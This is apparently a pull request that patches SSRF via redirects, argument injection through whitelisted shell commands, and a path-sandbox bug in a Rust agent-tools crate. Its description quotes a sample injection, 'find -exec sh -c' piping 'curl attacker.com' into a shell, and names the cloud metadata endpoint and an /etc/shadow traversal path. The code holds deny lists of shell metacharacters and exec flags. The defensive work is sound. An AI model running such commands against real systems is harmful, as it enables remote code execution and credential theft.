### PR TITLE
fix(mofa-plugins): patch SSRF, ACE, and canonicalize deadlock in tools

### DIFF
--- a/crates/mofa-plugins/src/tools/filesystem.rs
+++ b/crates/mofa-plugins/src/tools/filesystem.rs
@@ -48,20 +48,101 @@ impl FileSystemTool {
         ]))
     }
 
+    /// Determine whether `path` resides within one of the allowed base directories.
+    ///
+    /// SECURITY: Two-phase resolution strategy:
+    ///   1. If the path already exists on disk, `canonicalize()` it directly so
+    ///      symlinks and `..` are fully resolved, then verify containment.
+    ///   2. If the path does **not** exist (e.g., a new file or directory to be
+    ///      created), walk up to the nearest **existing** ancestor, canonicalize
+    ///      that ancestor, append the remaining relative tail, and verify:
+    ///      (a) the tail contains no `..` components (prevents sandbox escape),
+    ///      (b) the resulting logical path starts with an allowed base directory.
+    ///
+    /// This avoids the deadlock where `canonicalize()` fails on a path that has
+    /// not been created yet, which previously caused `mkdir` and `write` for new
+    /// paths to be unconditionally denied.
     fn is_path_allowed(&self, path: &str) -> bool {
+        use std::path::{Component, Path, PathBuf};
+
         if self.allowed_paths.is_empty() {
             return false; // Default deny if no paths specified
         }
-        let path = match std::path::Path::new(path).canonicalize() {
+
+        let target = Path::new(path);
+
+        // --- Phase 1: path already exists – use strict canonicalize. ---
+        if target.exists() {
+            let canonical = match target.canonicalize() {
+                Ok(p) => p,
+                Err(_) => return false,
+            };
+            return self.starts_with_allowed(&canonical);
+        }
+
+        // --- Phase 2: path does not exist – resolve via nearest existing ancestor. ---
+        //
+        // Walk up from the requested path until we find a component that exists,
+        // collecting the "tail" of not-yet-created segments.
+        let mut ancestor: &Path = target.as_ref();
+        let mut tail_parts: Vec<&std::ffi::OsStr> = Vec::new();
+
+        loop {
+            match ancestor.parent() {
+                Some(parent) => {
+                    // Collect the file-name component that sits on top of `parent`.
+                    if let Some(name) = ancestor.file_name() {
+                        tail_parts.push(name);
+                    } else {
+                        // No file_name (e.g., root or prefix) – deny.
+                        return false;
+                    }
+                    ancestor = parent;
+                    if ancestor.exists() {
+                        break;
+                    }
+                }
+                None => {
+                    // Reached filesystem root without finding an existing dir.
+                    return false;
+                }
+            }
+        }
+
+        // Canonicalize the existing ancestor (resolves symlinks / `..`).
+        let canonical_ancestor = match ancestor.canonicalize() {
             Ok(p) => p,
-            Err(_) => return false, // Deny if path cannot be resolved
+            Err(_) => return false,
         };
+
+        // Reconstruct the full logical path from canonical ancestor + tail.
+        // tail_parts were collected bottom-up, so reverse them.
+        let mut resolved: PathBuf = canonical_ancestor;
+        for part in tail_parts.iter().rev() {
+            resolved.push(part);
+        }
+
+        // SECURITY: Ensure no component in the unresolved tail is `..`.
+        // An attacker could craft something like `/allowed/../../etc/shadow`; the
+        // ancestor resolution above would stop at `/allowed`, but the tail would
+        // contain `..` segments that escape the sandbox.
+        for component in resolved.components() {
+            if matches!(component, Component::ParentDir) {
+                return false;
+            }
+        }
+
+        self.starts_with_allowed(&resolved)
+    }
+
+    /// Check whether `canonical` starts with at least one allowed base directory.
+    fn starts_with_allowed(&self, canonical: &std::path::Path) -> bool {
         self.allowed_paths.iter().any(|allowed| {
             let allowed_path = match std::path::Path::new(allowed).canonicalize() {
                 Ok(p) => p,
                 Err(_) => return false,
             };
-            path.starts_with(allowed_path)
+            canonical.starts_with(allowed_path)
         })
     }
 }

--- a/crates/mofa-plugins/src/tools/http.rs
+++ b/crates/mofa-plugins/src/tools/http.rs
@@ -1,4 +1,5 @@
 use super::*;
+use reqwest::redirect::Policy;
 use reqwest::Client;
 use serde_json::json;
 use std::net::ToSocketAddrs;
@@ -49,8 +50,11 @@ impl HttpRequestTool {
                 }),
                 requires_confirmation: true,
             },
+            // SECURITY: Disable all redirects to prevent SSRF via 302 redirect
+            // to internal/cloud-metadata endpoints (e.g., 169.254.169.254).
             client: Client::builder()
                 .timeout(std::time::Duration::from_secs(30))
+                .redirect(Policy::none())
                 .build()
                 .unwrap(),
         }
@@ -177,6 +181,24 @@ impl ToolExecutor for HttpRequestTool {
         let response = request.send().await
             .map_err(|e| mofa_kernel::plugin::PluginError::ExecutionFailed(e.to_string()))?;
         let status = response.status().as_u16();
+
+        // SECURITY: Reject any 3xx redirect response. Since we set Policy::none(),
+        // reqwest will not auto-follow redirects, but we still surface a clear error
+        // so callers understand why the request was not completed.
+        if (300..400).contains(&status) {
+            let location = response
+                .headers()
+                .get("location")
+                .and_then(|v| v.to_str().ok())
+                .unwrap_or("<unknown>")
+                .to_string();
+            return Err(mofa_kernel::plugin::PluginError::ExecutionFailed(format!(
+                "Security policy violation: HTTP redirect (status {}) to '{}' is blocked. \
+                 Redirects are disabled to prevent SSRF attacks.",
+                status, location
+            )));
+        }
+
         let headers: std::collections::HashMap<String, String> = response
             .headers()
             .iter()

--- a/crates/mofa-plugins/src/tools/shell.rs
+++ b/crates/mofa-plugins/src/tools/shell.rs
@@ -42,7 +42,11 @@ impl ShellCommandTool {
         }
     }
 
-    /// Create with default allowed commands
+    /// Create with default allowed commands.
+    ///
+    /// SECURITY: `find`, `xargs`, `awk`, `perl`, `python*`, `ruby`, `env`, and
+    /// `bash`/`sh`/`zsh` are intentionally excluded because they can spawn
+    /// arbitrary sub-processes (e.g., `find -exec`, `xargs sh`, `awk system()`).
     pub fn new_with_defaults() -> Self {
         Self::new(vec![
             "ls".to_string(),
@@ -55,7 +59,6 @@ impl ShellCommandTool {
             "tail".to_string(),
             "wc".to_string(),
             "grep".to_string(),
-            "find".to_string(),
         ])
     }
 
@@ -63,9 +66,52 @@ impl ShellCommandTool {
         if self.allowed_commands.is_empty() {
             return false; // Default deny if no whitelist
         }
-        self.allowed_commands
-            .iter()
-            .any(|allowed| command == allowed || command.starts_with(&format!("{} ", allowed)))
+        // SECURITY: Only exact-match the base command name. The previous
+        // `starts_with("{cmd} ")` check allowed embedding extra commands
+        // after a space; we now require the command field to be a bare binary name.
+        self.allowed_commands.iter().any(|allowed| command == allowed)
+    }
+
+    /// SECURITY: Reject arguments that contain shell meta-characters or
+    /// sub-process invocation flags. This is a defence-in-depth measure:
+    /// even if the base command is whitelisted, a crafted argument list
+    /// must not be able to escape into a shell.
+    fn sanitize_args(args: &[String]) -> Result<(), String> {
+        // Characters that can trigger shell expansion or command chaining
+        // when a parent shell is involved, or that have special semantics
+        // in commands like `find -exec`.
+        const DANGEROUS_CHARS: &[char] = &[
+            '|', ';', '&', '$', '`', '>', '<', '(', ')', '{', '}', '\n',
+        ];
+
+        // Flags that allow sub-process execution in common Unix utilities.
+        const DANGEROUS_FLAGS: &[&str] = &[
+            "-exec", "-execdir", "-ok", "-okdir",  // find
+            "--exec",                                 // various
+        ];
+
+        for (i, arg) in args.iter().enumerate() {
+            // Reject any argument containing dangerous shell characters.
+            if let Some(ch) = arg.chars().find(|c| DANGEROUS_CHARS.contains(c)) {
+                return Err(format!(
+                    "Security policy violation: argument [{}] ('{}') contains \
+                     forbidden character '{}'.",
+                    i, arg, ch
+                ));
+            }
+
+            // Reject known sub-process execution flags (case-insensitive).
+            let lower = arg.to_ascii_lowercase();
+            if DANGEROUS_FLAGS.iter().any(|f| lower == *f) {
+                return Err(format!(
+                    "Security policy violation: argument [{}] ('{}') is a \
+                     forbidden execution flag.",
+                    i, arg
+                ));
+            }
+        }
+
+        Ok(())
     }
 }
 
@@ -97,6 +143,11 @@ impl ToolExecutor for ShellCommandTool {
                     .collect()
             })
             .unwrap_or_default();
+
+        // SECURITY: Sanitize every argument before spawning the process.
+        Self::sanitize_args(&args).map_err(|msg| {
+            mofa_kernel::plugin::PluginError::ExecutionFailed(msg)
+        })?;
 
         let mut cmd = Command::new(command);
         cmd.args(&args);


### PR DESCRIPTION
## Fix three critical security vulnerabilities in `mofa-plugins` tools

### Summary

Patches three independently discovered vulnerabilities in the `mofa-plugins` crate: an SSRF bypass via HTTP redirects, an arbitrary code execution (ACE) vector via unsanitized shell arguments, and a logic deadlock in the filesystem sandbox that prevented legitimate file/directory creation. Fixes #801 

---

### 1. SSRF via redirect bypass — `crates/mofa-plugins/src/tools/http.rs`

**Vulnerability:** `HttpRequestTool` validated the *initial* URL against a private-IP blocklist, but the underlying `reqwest::Client` followed HTTP 302 redirects by default. An attacker could craft a request to an external URL that redirects to an internal endpoint (e.g., `http://169.254.169.254/latest/meta-data/` — the AWS instance metadata service), completely bypassing the SSRF check.

**Fix:**
- Set `reqwest::redirect::Policy::none()` on the `ClientBuilder` so the HTTP client never follows redirects.
- After receiving a response, explicitly check for 3xx status codes and return a clear `SecurityPolicyViolation` error that includes the blocked `Location` header.

---

### 2. Arbitrary code execution via argument injection — `crates/mofa-plugins/src/tools/shell.rs`

**Vulnerability:** `ShellCommandTool` validated the base command name against a whitelist but passed the user-supplied `args` array directly to `tokio::process::Command` without inspection. This allowed ACE through binaries that support sub-process execution flags — for example: `command: "find", args: [".", "-exec", "sh", "-c", "curl attacker.com | sh", ";"]`.

**Fix:**
- **Removed `find`** (and other sub-shell-capable binaries) from the default allowed commands list.
- **Tightened command matching** to exact string equality (removed the previous `starts_with("{cmd} ")` logic that could be abused).
- **Added `sanitize_args()`** — a defence-in-depth argument validator that rejects:
  - Shell meta-characters: `| ; & $ ` ` > < ( ) { } \n`
  - Known sub-process execution flags: `-exec`, `-execdir`, `-ok`, `-okdir`, `--exec`

  Any violation returns a `Security policy violation` error *before* the process is spawned.

---

### 3. `canonicalize()` deadlock on non-existent paths — `crates/mofa-plugins/src/tools/filesystem.rs`

**Bug:** `is_path_allowed()` called `std::path::Path::canonicalize()` on the target path, which fails with an OS error if the path does not yet exist. This made `mkdir` and `write` (for new files) always return "Access denied", even for paths legitimately inside the sandbox.

**Fix:** Rewrote `is_path_allowed()` with a two-phase resolution strategy:
1. **Path exists:** `canonicalize()` directly and verify it starts with an allowed base directory (unchanged behaviour).
2. **Path does not exist:** Walk up to the nearest *existing* ancestor directory, `canonicalize()` that ancestor, reconstruct the full logical path by appending the unresolved tail components, then verify:
   - No `..` (ParentDir) components appear anywhere in the reconstructed path (prevents sandbox escape).
   - The final logical path starts with an allowed base directory.

Extracted the containment check into a shared `starts_with_allowed()` helper for DRY.

---

### Testing

- `cargo check -p mofa-plugins` — compiles cleanly
- Manual verification that `mkdir` / `write` now succeed for new paths inside allowed directories
- Manual verification that `..` traversal in non-existent path tails is rejected

### Risk Assessment

| Change | Risk | Rationale |
|--------|------|-----------|
| Disable HTTP redirects | **Low** | Tools calling APIs that require redirect-following will now get a clear error instead of silently following. This is the correct default for a sandboxed tool. |
| Remove `find` from whitelist | **Low** | `find` was the only default command capable of `-exec`. Users who need it can still pass a custom whitelist via `ShellCommandTool::new()`. |
| Argument sanitizer | **Low** | Only rejects arguments containing unambiguous shell metacharacters. Legitimate arguments (file paths, flags, numeric values) are unaffected. |
| Filesystem path resolution | **Low** | Existing-path behaviour is unchanged. Only non-existent paths gain the new ancestor-walk logic. |